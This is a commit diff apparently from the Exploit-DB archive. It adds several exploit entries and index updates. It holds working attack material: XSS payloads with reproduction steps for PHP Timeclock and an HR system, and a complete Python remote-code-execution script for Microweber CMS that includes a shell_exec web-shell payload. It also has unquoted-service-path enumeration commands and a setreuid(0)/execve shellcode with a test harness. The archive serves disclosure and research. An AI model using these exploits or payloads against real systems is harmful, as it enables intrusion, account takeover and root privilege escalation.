DB: 2021-05-11

7 changes to exploits/shellcodes DHCP Broadband 4.1.0.1503 - 'dhcpt.exe' Unquoted Service Path BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path Exploit Title: Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection # Date: May 3rd 2021 PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS) Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated) Microweber CMS 1.1.20 - Remote Code Execution (Authenticated) Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes)
2021-05-11 05:01:57 +00:00 · 2021-05-11 05:01:57 +00:00 · 599b380301
commit 599b380301
parent e4f4680368
9 changed files with 462 additions and 2 deletions
--- a/exploits/php/webapps/49853.txt
+++ b/exploits/php/webapps/49853.txt
@ -0,0 +1,61 @@
 # Exploit Title: PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS)
 # Date: May 3rd 2021
 # Exploit Author: Tyler Butler
 # Vendor Homepage: http://timeclock.sourceforge.net
 # Software Link: https://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/
 # Version: 1.04
 # Tested on: PHP 4.4.9/5.3.3 Apache 2.2 MySql 4.1.22/5
 Description: PHP Timeclock version 1.04 (and prior) suffers from multiple Cross-Site Scripting vulnerabilities
 #1: Unauthenticated Reflected XSS: Arbitrary javascript can be injected into the application by appending a termination /'> and payload directly to the end of the GET request URL. The vulnerable paths include (1) /login.php  (2) /timeclock.php (3) /reports/audit.php and (4) /reports/timerpt.php. 
 Payload: /'><svg/onload=alert`xss`>
 Example: http://target/login.php/'%3E%3Csvg/onload=alert%60xss%60%3E
 ß
 Steps to reproduce:
  1. Navigate to a site that uses PHP Timeclock 1.04 or earlier
  2. Make a GET request to one of the four resources mentioned above
  3. Append /'> and the payload to the end of the request
  4. Submit the request and observe payload execution
 #2: Unauthenticated Reflected XSS: Arbitrary javascript can be injected into the application in POST requests to (1) /reports/audit.php (2) /reports/total_hours.php (3) /reports/timerpt.php via the from_date and to_date parameters.
 # Example: 
 POST /reports/audit.php HTTP/1.1
 Host: localhost
 Content-Length: 98
 Cache-Control: max-age=0
 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90"
 sec-ch-ua-mobile: ?0
 Upgrade-Insecure-Requests: 1
 Origin: http://localhost
 Content-Type: application/x-www-form-urlencoded
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: navigate
 Sec-Fetch-User: ?1
 Sec-Fetch-Dest: document
 Referer: http://localhost/reports/audit.php
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Cookie: PHPSESSID=62cfcffbd929595ba31915b4d8f01d7d; remember_me=foo
 Connection: close
 date_format=M%2Fd%2Fyyyy&from_date=5%2F2%2F2021'><svg/onload=alert`xss`>&to_date=5%2F18%2F2021&csv=0&submit.x=40&submit.y=5
 Payload: '><svg/onload=alert`xss`>
 Steps to reproduce:
  1. Navigate to a site that uses PHP Timeclock 1.04 or earlier
  2. Create a report at one of the vulnerable directories noted above
  3. Intercept the request with a proxy tool like BurpSuite
  4. Inject payload into the from_date or to_date fields
--- a/exploits/php/webapps/49854.txt
+++ b/exploits/php/webapps/49854.txt
@ -0,0 +1,26 @@
 # Exploit Title: Human Resource Information System  0.1  - 'First Name'  Persistent Cross-Site Scripting (Authenticated)
 # Date: 04-05-2021
 # Exploit Author: Reza Afsahi
 # Vendor Homepage: https://www.sourcecodester.com
 # Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html
 # Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code
 # Version: 0.1
 # Tested on: PHP 7.4.11 , Linux x64_x86
 # --- Description --- #
 # The web application allows for an  assisstant to inject persistent Cross-Site-Scripting payload which will be executed in both assistant and Super Admin panel  
 # --- Proof of concept --- #
 1- Login as Assistant and go to:  http://localhost/code/Admin_Dashboard/Add_employee.php
 2- Click on Add Employee button
 3- Inject this payload into First Name input : <script>alert('xss')</script> 
 4- and fill other inputs as you want (Other inputs might be vulnerable as well) then click on Save button.
 5- refresh the page and Xss popup will be triggered.
 6- Now if Super Admin visit this page in his/her Dashboard : http://localhost/code/Superadmin_Dashboard/Add_employee.php
 7- Our Xss payload will be executed on Super Admin Browser
 ** Attacker can use this vulnerability to take over Super Admin account **
--- a/exploits/php/webapps/49856.py
+++ b/exploits/php/webapps/49856.py
@ -0,0 +1,222 @@
 # Exploit Title: Microweber CMS 1.1.20 - Remote Code Execution (Authenticated) 
 # Date: 2020-10-31
 # Exploit Author: sl1nki
 # Vendor Homepage: https://microweber.org/
 # Software Link: https://github.com/microweber/microweber/tree/1.1.20
 # Version: <=1.1.20
 # Tested on: Ubuntu 18.04
 # CVE : CVE-2020-28337
 #
 # Example usage with default phpinfo() payload:
 #     ./microweber_rce.py \
 #         --hostname "http://microwebertest.com" \
 #         --username "admin" \
 #         --password "password123"
 #
 #
 # Example usage with custom payload (shell_exec):
 #     ./microweber_rce.py \
 #         --hostname "http://microwebertest.com" \
 #         --username "admin" \
 #         --password "password123" \
 #         --payload '<?php if (isset($_REQUEST["fexec"])) {echo "<pre>" . shell_exec($_REQUEST["fexec"]) . "</pre>";} ?>'
 #
 # Notes:
 #   * SSL verification is disabled by default
 #   * If for some reason the --target-path "/userfiles/cache
 #!/usr/bin/python3
 #/" doesn't work, "/userfiles/modules/" is a good one too.
 #
 #
 #
 import argparse
 import re
 import requests
 import sys
 import zipfile
 from io import BytesIO
 # Disable insecure SSL warnings
 requests.packages.urllib3.disable_warnings()
 class Microweber():
    def __init__(self, baseUrl, proxies=None):
        self.baseUrl = baseUrl
        self.proxies = proxies
        self.cookies = None
        self.loginUrl = "/api/user_login"
        self.uploadUrl = "/plupload"
        self.moveZipToBackupUrl = "/api/Microweber/Utils/Backup/move_uploaded_file_to_backup"
        self.restoreBackupUrl = "/api/Microweber/Utils/Backup/restore"
        self.targetPath = "/userfiles/cache/"
        self.targetFilename = "payload.php"
        self.zipPayloadName = "payload.zip"
    def makePostRequest(self, url, data=None, files=None, headers=None):
        return requests.post(self.baseUrl + url,
            data=data,
            files=files,
            headers=headers,
            cookies=self.cookies,
            proxies=self.proxies,
            verify=False
        )
    def makeGetRequest(self, url, params=None):
        return requests.post(self.baseUrl + url,
            params=params,
            cookies=self.cookies,
            proxies=self.proxies,
            verify=False
        )
    def login(self, username, password):
        res = self.makePostRequest(self.loginUrl, data={
            "username": username,
            "password": password
        })
        if res.status_code == 200 and 'success' in res.json() and res.json()['success'] == "You are logged in!":
            print(f"[+] Successfully logged in as {username}")
            self.cookies = res.cookies
        else:
            print(f"[-] Unable to login.  Status Code: {res.status_code}")
            sys.exit(-1)
    def createZip(self, path=None, filename=None, payload=None):
        # In-memory adaptation of ptoomey3's evilarc
    # https://github.com/ptoomey3/evilarc
        if payload == None:
            payload = "<?php phpinfo(); ?>"
        zd = BytesIO()
        zf = zipfile.ZipFile(zd, "w")
        # The custom Unzip class uses a path under the webroot for cached file extraction
        # /storage/cache/backup_restore/<md5 hash>/
        # so moving up 4 directories puts us at the webroot
        zf.writestr(f"../../../..{path}{filename}", payload)
        zf.close()
        return zd
    def uploadZip(self, zipData):
        # Upload the zip data as a general file
        res = self.makePostRequest(self.uploadUrl,
            headers={"Referer": ""},
            data={
                "name": self.zipPayloadName,
                "chunk": 0,
                "chunks": 1
            },
            files={"file": (self.zipPayloadName, zipData.getvalue(), "application/zip")}
        )
        if res.status_code == 200:
            print(f"[+] Successfully uploaded: {self.zipPayloadName}")
            j = res.json()
            print(f"[+]     URL: {j['src']}")
            print(f"[+]     Resulting Filename: {j['name']}")
            self.zipPayloadName = j['name']
        else:
            print(f"[-] Unable to upload: {self.zipPayloadName} (Status Code: {res.status_code})")
            sys.exit(-1)
    def getAbsoluteWebRoot(self):
        # Determine the webroot using the debug output and the DefaultController.php path
        res = self.makeGetRequest("", params={
            "debug": "true"
        })
        if res.status_code != 200:
            print(f"[-] Unable to collect debug information.  Bad server response: {res.status_code}")
            sys.exit(-1)
        target = "src/Microweber/Controllers/DefaultController.php"
        m = re.findall('([\/\w]+)\/src\/Microweber\/Controllers\/DefaultController\.php', res.text)
        if len(m) == 1:
            return m[0]
        else:
            print(f"[-] Unable to determine the webroot using {target}.  Found {len(m)} matches")
    def moveZipToBackup(self):
        # Move the uploaded zip file into the backup directory
        webRoot = self.getAbsoluteWebRoot()
        hostname = self.baseUrl.split("//")[1]
        src = f"{webRoot}/userfiles/media/{hostname}/{self.zipPayloadName}"
        res = self.makeGetRequest(self.moveZipToBackupUrl, params={
            "src": src
        })
        if res.status_code == 200 and 'success' in res.json() and res.json()['success'] == f"{self.zipPayloadName} was uploaded!":
            print(f"[+] Successfully moved {self.zipPayloadName} to backup")
        else:
            print(f"[-] Unable to move zip to backup ({res.status_code})")
            sys.exit(-1)
    def restoreBackup(self, filename):
        # With the zip file in the backup directory, 'restore' it, which will cause it to be extracted unsafely
        res = self.makePostRequest(self.restoreBackupUrl, data={
       "id": filename
        })
        if res.status_code == 200 and "Backup was restored!" in res.text:
            print(f"[+] Successfully restored backup {filename}")
        else:
            print(f"[-] Unable to restore backup {filename}")
            sys.exit(-1)
    def exploit(self, payload=None):
        zipData = m.createZip(self.targetPath, self.targetFilename, payload=payload)
        m.uploadZip(zipData)
        m.moveZipToBackup()
        m.restoreBackup(self.zipPayloadName)
        print(f"[+] Successfully uploaded payload to {self.targetFilename}!=")
        print(f"[+]     Visit: {self.baseUrl}{self.targetPath}{self.targetFilename}")
 if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--hostname", required=True, dest="hostname", help="Microweber hostname with protocol (e.g. http://microwebertest.com)")
    parser.add_argument("--http-proxy", required=False, dest="http_proxy", help="HTTP Proxy (e.g. http://127.0.0.1:8000)")
    parser.add_argument("--username", "-u", required=True, dest="username", help="Username of administrative user")
    parser.add_argument("--password", "-p", required=True, dest="password", help="Password of administrative user")
    parser.add_argument("--payload", required=False, dest="payload", help="Payload contents.  Should be a string of PHP code.  (default is phpinfo() )")
    # Uncommon args
    parser.add_argument("--target-file", required=False, dest="target_file", help="Target filename of the payload (default: payload.php")
    parser.add_argument("--target-path", required=False, dest="target_path", help="Target path relative to webroot for the payload (default: /userfiles/cache/")
    parser.add_argument("--zip-name", required=False, dest="zip_name", help="File name of tmp backup zip")
    args = parser.parse_args()
    proxies = None
    if args.http_proxy:
        proxies = {
            "http": args.http_proxy
        }
    m = Microweber(args.hostname, proxies=proxies)
    if args.target_file:
        m.targetFilename = args.target_file
    if args.target_path:
        m.targetPath = args.target_path
    if args.zip_name:
        m.zipPayloadName = args.zip_name
    m.login(args.username, args.password)
    m.exploit(args.payload)
--- a/exploits/windows/local/49850.txt
+++ b/exploits/windows/local/49850.txt
@ -0,0 +1,35 @@
 # Exploit Title: DHCP Broadband 4.1.0.1503 - 'dhcpt.exe' Unquoted Service Path
 # Discovery by: Erick Galindo 
 # Discovery Date: 2020-05-07
 # Vendor Homepage: https://www.weird-solutions.com
 # Software :  https://www.weird-solutions.com/download/products/dhcpbbv4_retail_x64.exe
 # Tested Version: 4.1.0.1503
 # Vulnerability Type: Unquoted Service Path
 # Tested on OS: Windows 10 Pro  x64 es
 # Step to discover Unquoted Service Path:
 C:\> wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i  "DHCP"
 DHCP Broadband 4        DHCP Broadband 4          C:\Program Files\DHCP Broadband 4\dhcpt.exe                        Auto
 # Service info
 C:\>sc qc "DHCP Broadband 4"
 [SC] QueryServiceConfig CORRECTO
 NOMBRE_SERVICIO: DHCP Broadband 4
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\DHCP Broadband 4\dhcpt.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : DHCP Broadband 4
        DEPENDENCIAS       : Nsi
                           : Afd
                           : NetBT
                           : Tcpip
        NOMBRE_INICIO_SERVICIO: LocalSystem
 #Exploit:
 This vulnerability could permit executing code during startup or reboot with the escalated privileges.
--- a/exploits/windows/local/49851.txt
+++ b/exploits/windows/local/49851.txt
@ -0,0 +1,35 @@
 # Exploit Title: BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path
 # Discovery by: Erick Galindo 
 # Discovery Date: 2020-05-07
 # Vendor Homepage: https://www.weird-solutions.com
 # Software :  https://www.weird-solutions.com/download/products/bootpt_demo_x64.exe
 # Tested Version: 2.0.0.1253
 # Vulnerability Type: Unquoted Service Path
 # Tested on OS: Windows 10 Pro  x64 es
 # Step to discover Unquoted Service Path:
 C:\> wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr  /i "BOOTP"
 BOOTP Turbo           BOOTP Turbo           C:\Program Files\BOOTP Turbo\bootpt.exe                    Auto
 # Service info
 C:\>sc qc "BOOTP Turbo"
 [SC] QueryServiceConfig CORRECTO
 NOMBRE_SERVICIO: BOOTP Turbo
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\BOOTP Turbo\bootpt.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : BOOTP Turbo
        DEPENDENCIAS       : Nsi
                           : Afd
                           : NetBT
                           : Tcpip
        NOMBRE_INICIO_SERVICIO: LocalSystem
 #Exploit:
 This vulnerability could permit executing code during startup or reboot with the escalated privileges.
--- a/exploits/windows/local/49852.txt
+++ b/exploits/windows/local/49852.txt
@ -0,0 +1,33 @@
 # Exploit Title: TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path
 # Discovery by: Erick Galindo 
 # Discovery Date: 2020-05-07
 # Vendor Homepage: https://www.weird-solutions.com
 # Software :  https://www.weird-solutions.com/download/products/tftpbbv4_retail_x64.exe
 # Tested Version: 4.3.0.1465
 # Vulnerability Type: Unquoted Service Path
 # Tested on OS: Windows 10 Pro  x64 es
 # Step to discover Unquoted Service Path:
 C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i  "tftpt"
 TFTP Broadband 4            TFTP Broadband 4                 C:\Program Files\TFTP Broadband 4\tftpt.exe               Auto
 C:\>sc qc "TFTP Broadband 4"
 [SC] QueryServiceConfig CORRECTO
 NOMBRE_SERVICIO: TFTP Broadband 4
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\TFTP Broadband 4\tftpt.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : TFTP Broadband 4
        DEPENDENCIAS       : Nsi
                           : Afd
                           : NetBT
                           : Tcpip
        NOMBRE_INICIO_SERVICIO: LocalSystem
 #Exploit:
 This vulnerability could permit executing code during startup or reboot with the escalated privileges.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11320,6 +11320,9 @@ id,file,description,date,author,type,platform,port
 49842,exploits/windows/local/49842.txt,"Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path",2021-05-07,"Erick Galindo",local,windows,
 49845,exploits/windows/local/49845.txt,"WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path",2021-05-07,"Erick Galindo",local,windows,
 49848,exploits/windows/local/49848.txt,"Epic Games Rocket League 1.95 - Stack Buffer Overrun",2021-05-07,LiquidWorm,local,windows,
 49850,exploits/windows/local/49850.txt,"DHCP Broadband 4.1.0.1503 - 'dhcpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,
 49851,exploits/windows/local/49851.txt,"BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,
 49852,exploits/windows/local/49852.txt,"TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -41004,7 +41007,7 @@ id,file,description,date,author,type,platform,port
 48980,exploits/php/webapps/48980.py,"Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)",2020-11-02,"Lyhin\'s Lab",webapps,php,
 48981,exploits/php/webapps/48981.py,"Monitorr 1.7.6m - Authorization Bypass",2020-11-02,"Lyhin\'s Lab",webapps,php,
 48984,exploits/php/webapps/48984.txt,"Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection",2020-11-03,yunaranyancat,webapps,php,
-48985,exploits/php/webapps/48985.txt,"Exploit Title: Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-03,Mosaaed,webapps,php,
+48985,exploits/php/webapps/48985.txt,"Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-03,Mosaaed,webapps,php,
 48986,exploits/php/webapps/48986.txt,"Processwire CMS 2.4.0 - 'download' Local File Inclusion",2020-11-04,Y1LD1R1M,webapps,php,
 48987,exploits/php/webapps/48987.txt,"PDW File Browser 1.3 - Remote Code Execution",2020-11-04,"David Bimmel",webapps,php,
 48988,exploits/php/webapps/48988.py,"School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution",2020-11-04,Mosaaed,webapps,php,
@ -44015,4 +44018,7 @@ id,file,description,date,author,type,platform,port
 49843,exploits/php/webapps/49843.txt,"Voting System 1.0 - Authentication Bypass (SQLI)",2021-05-07,secure77,webapps,php,
 49846,exploits/php/webapps/49846.txt,"Voting System 1.0 - Remote Code Execution (Unauthenticated)",2021-05-07,secure77,webapps,php,
 49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php,
-49849,exploits/php/webapps/49849.txt,"PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection # Date: May 3rd 2021",2021-05-07,"Tyler Butler",webapps,php,
+49849,exploits/php/webapps/49849.txt,"PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection",2021-05-07,"Tyler Butler",webapps,php,
 49853,exploits/php/webapps/49853.txt,"PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS)",2021-05-10,"Tyler Butler",webapps,php,
 49854,exploits/php/webapps/49854.txt,"Human Resource Information System  0.1  - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php,
 49856,exploits/php/webapps/49856.py,"Microweber CMS 1.1.20 - Remote Code Execution (Authenticated)",2021-05-10,sl1nki,webapps,php,
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -1036,3 +1036,4 @@ id,file,description,date,author,type,platform
 49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",2021-04-15,s1ege,shellcode,linux_x86-64
 49819,shellcodes/windows_x86-64/49819.c,"Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)",2021-05-03,boku,shellcode,windows_x86-64
 49820,shellcodes/windows_x86-64/49820.c,"Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)",2021-05-03,boku,shellcode,windows_x86-64
 49855,shellcodes/linux_x86/49855.c,"Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes)",2021-05-10,"Artur Szymczak",shellcode,linux_x86
--- a/shellcodes/linux_x86/49855.c
+++ b/shellcodes/linux_x86/49855.c
@ -0,0 +1,41 @@
 /*
 	Author: 	Artur [ajes] Szymczak (2021)
 	Function:	Linux x86 shellcode, setreuid to 0 and then execute /bin/sh
 	Size:		29 bytes
 	Testing:
 $ gcc -fno-stack-protector -z execstack shellcode_tester.c -o shellcode
 shellcode_tester.c: In function ‘main’:
 shellcode_tester.c:25:2: warning: incompatible implicit declaration of built-in function ‘printf’ [enabled by default]
 shellcode_tester.c:25:24: warning: incompatible implicit declaration of built-in function ‘strlen’ [enabled by default]
 $ sudo chown root:root ./shellcode
 $ sudo chmod u+s ./shellcode
 $ ./shellcode
 Length: 29
 # id
 uid=0(root) gid=1000(artur) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare),1000(artur)
 */
 char shellcode[] = ""
 	"\x31\xc0"		// clear eax, as we don't know its state
 	"\xb0\x46"		// syscall setreuid
 	"\x31\xdb"		// real user ID = 0
 	"\x31\xc9"		// effective user ID = 0
 	"\x99"			// saved set-user-ID = 0 (using EDX)
 	"\xcd\x80"		// call it
 	"\x96"			// clear eax, as we don't know its state after former syscall
 	"\xb0\x0b"		// syscall execve
 	"\x53"			// NULL string terminator
 	"\x68\x2f\x2f\x73\x68"	// //sh
 	"\x68\x2f\x62\x69\x6e"	// /bin
 	"\x89\xe3"		// pointer to above string - path to the program to execve
 	"\xcd\x80";		// call it
 void main(void)
 {
 	printf("Length: %d\n",strlen(shellcode));
 	((void(*)(void))shellcode)();
 }